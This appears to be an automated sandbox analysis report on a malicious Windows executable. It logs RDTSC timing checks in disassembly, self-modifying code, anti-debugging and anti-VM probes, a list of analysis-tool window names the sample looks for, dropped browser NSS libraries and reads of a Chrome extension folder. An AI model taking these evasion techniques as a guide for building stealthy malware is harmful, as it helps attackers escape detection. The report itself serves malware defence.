              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11707A7 second address: 117082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518553h 0x00000009 popad 0x0000000a jmp 00007F06D8518556h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, dword ptr [ebp+122D1BDBh] 0x00000019 push dword ptr [ebp+1246A6DCh] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F06D8518548h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c call 00007F06D8518549h 0x00000041 pushad 0x00000042 jmp 00007F06D8518556h 0x00000047 push eax 0x00000048 push edx 0x00000049 jns 00007F06D8518546h 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 117082C second address: 1170867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9D5h 0x0000000f pop edx 0x00000010 pushad 0x00000011 jc 00007F06D8B4D9C6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jg 00007F06D8B4D9C6h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1170867 second address: 1170871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1170871 second address: 1170875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11739CD second address: 11739EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Ch 0x00000009 jc 00007F06D8518546h 0x0000000f popad 0x00000010 pop edx 0x00000011 jng 00007F06D851855Ah 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11739EE second address: 11739F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11739F4 second address: 11739FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 117555F second address: 1175563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70291 second address: 4D70295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70295 second address: 4D70299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70299 second address: 4D7029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7029F second address: 4D702EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D2h 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F06D8B4D9CAh 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 movzx ecx, dx 0x0000001b movsx edi, ax 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov bl, cl 0x00000024 jmp 00007F06D8B4D9CDh 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx edi, ax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D702EC second address: 4D702F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70320 second address: 4D70344 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8B4D9D9h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70344 second address: 4D7034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7034A second address: 4D7034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7034E second address: 4D703D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F06D8518559h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov eax, 55ED7F73h 0x00000018 call 00007F06D8518558h 0x0000001d movzx esi, bx 0x00000020 pop edi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F06D8518555h 0x0000002c sbb ch, 00000016h 0x0000002f jmp 00007F06D8518551h 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 mov edx, eax 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D703D9 second address: 4D703EE instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9CBh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7047C second address: 4D704FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D851854Fh 0x00000009 sub eax, 4A665E7Eh 0x0000000f jmp 00007F06D8518559h 0x00000014 popfd 0x00000015 mov dh, ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push F74EBB96h 0x0000001f pushad 0x00000020 mov bx, si 0x00000023 push ecx 0x00000024 mov eax, edi 0x00000026 pop ebx 0x00000027 popad 0x00000028 add dword ptr [esp], 7D976092h 0x0000002f jmp 00007F06D8518558h 0x00000034 call 00007F074859C057h 0x00000039 push 74DF27D0h 0x0000003e push dword ptr fs:[00000000h] 0x00000045 mov eax, dword ptr [esp+10h] 0x00000049 mov dword ptr [esp+10h], ebp 0x0000004d lea ebp, dword ptr [esp+10h] 0x00000051 sub esp, eax 0x00000053 push ebx 0x00000054 push esi 0x00000055 push edi 0x00000056 mov eax, dword ptr [74E80140h] 0x0000005b xor dword ptr [ebp-04h], eax 0x0000005e xor eax, ebp 0x00000060 push eax 0x00000061 mov dword ptr [ebp-18h], esp 0x00000064 push dword ptr [ebp-08h] 0x00000067 mov eax, dword ptr [ebp-04h] 0x0000006a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000071 mov dword ptr [ebp-08h], eax 0x00000074 lea eax, dword ptr [ebp-10h] 0x00000077 mov dword ptr fs:[00000000h], eax 0x0000007d ret 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F06D8518557h 0x00000085 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D704FF second address: 4D70537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F06D8B4D9CEh 0x00000012 mov edx, dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70537 second address: 4D7053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7053D second address: 4D70565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F06D8B4D9CAh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70565 second address: 4D70574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70574 second address: 4D7058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7058C second address: 4D705B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edx] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F06D8518558h 0x00000012 pop eax 0x00000013 mov cl, bl 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D705B5 second address: 4D7060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F06D8B4D9CCh 0x00000011 sub ecx, 656E8948h 0x00000017 jmp 00007F06D8B4D9CBh 0x0000001c popfd 0x0000001d mov dl, cl 0x0000001f popad 0x00000020 test al, al 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007F06D8B4D9CAh 0x0000002d and esi, 66884BA8h 0x00000033 jmp 00007F06D8B4D9CBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7060F second address: 4D70627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518554h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70627 second address: 4D705B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F06D8B4D91Ch 0x00000011 mov al, byte ptr [edx] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F06D8B4D9D8h 0x0000001b pop eax 0x0000001c mov cl, bl 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70670 second address: 4D70683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70683 second address: 4D706FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F06D8B4D9CCh 0x00000011 sub cx, 3858h 0x00000016 jmp 00007F06D8B4D9CBh 0x0000001b popfd 0x0000001c call 00007F06D8B4D9D8h 0x00000021 mov esi, 09FE2891h 0x00000026 pop ecx 0x00000027 popad 0x00000028 lea ebx, dword ptr [edi+01h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F06D8B4D9D8h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D706FC second address: 4D70712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70712 second address: 4D7072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 mov bl, cl 0x00000008 pop ebx 0x00000009 popad 0x0000000a inc edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F06D8B4D9CCh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7072D second address: 4D7073C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7073C second address: 4D707D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D8B4D9CFh 0x00000009 add cl, FFFFFFEEh 0x0000000c jmp 00007F06D8B4D9D9h 0x00000011 popfd 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test al, al 0x00000019 jmp 00007F06D8B4D9CAh 0x0000001e jne 00007F0748BC5CC8h 0x00000024 jmp 00007F06D8B4D9D0h 0x00000029 mov ecx, edx 0x0000002b jmp 00007F06D8B4D9D0h 0x00000030 shr ecx, 02h 0x00000033 jmp 00007F06D8B4D9D0h 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e rep movsd 0x00000040 rep movsd 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F06D8B4D9D7h 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D707D3 second address: 4D707D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D707D9 second address: 4D707DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D707DD second address: 4D707F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ecx, 11246AA5h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D707F2 second address: 4D70804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9CEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70804 second address: 4D70836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 03h 0x0000000e jmp 00007F06D8518556h 0x00000013 rep movsb 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70836 second address: 4D7083C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7083C second address: 4D70861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70861 second address: 4D70865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70865 second address: 4D70869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70869 second address: 4D7086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7086F second address: 4D70875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70875 second address: 4D70879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70879 second address: 4D708C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, ebx 0x0000000a pushad 0x0000000b mov ch, 20h 0x0000000d pushfd 0x0000000e jmp 00007F06D8518555h 0x00000013 adc esi, 5290EDC6h 0x00000019 jmp 00007F06D8518551h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ecx, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F06D851854Dh 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D708C7 second address: 4D708F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D7h 0x00000008 mov bh, cl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr fs:[00000000h], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D708F3 second address: 4D708F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D708F9 second address: 4D70944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 or esi, 663F09E6h 0x0000000f jmp 00007F06D8B4D9D1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F06D8B4D9CCh 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70944 second address: 4D7094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7094A second address: 4D7094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D7094E second address: 4D7047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov ax, dx 0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 pop ebx 0x00000011 pushad 0x00000012 mov edi, 28760A7Eh 0x00000017 mov al, dh 0x00000019 popad 0x0000001a leave 0x0000001b jmp 00007F06D851854Eh 0x00000020 retn 0008h 0x00000023 cmp dword ptr [ebp-2Ch], 10h 0x00000027 mov eax, dword ptr [ebp-40h] 0x0000002a jnc 00007F06D8518545h 0x0000002c push eax 0x0000002d lea edx, dword ptr [ebp-00000590h] 0x00000033 push edx 0x00000034 call esi 0x00000036 push 00000008h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F06D8518557h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 4D70A30 second address: 4D70A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 64CAh 0x00000007 mov ebx, 0DE50396h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F06D8B4D9D3h 0x00000017 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\random(1).exeSpecial instruction interceptor: First address: ECF924 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(1).exeSpecial instruction interceptor: First address: 110955D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(1).exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exe TID: 7636Thread sleep time: -30015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C59EBF0 PR_GetNumberOfProcessors,GetSystemInfo,0_2_6C59EBF0
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: random(1).exe, random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\random(1).exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\random(1).exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\random(1).exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\random(1).exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\random(1).exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(1).exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\random(1).exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(1).exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\random(1).exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\random(1).exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(1).exeFile opened: NTICE
              Source: C:\Users\user\Desktop\random(1).exeFile opened: SICE
              Source: C:\Users\user\Desktop\random(1).exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\random(1).exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C66AC62
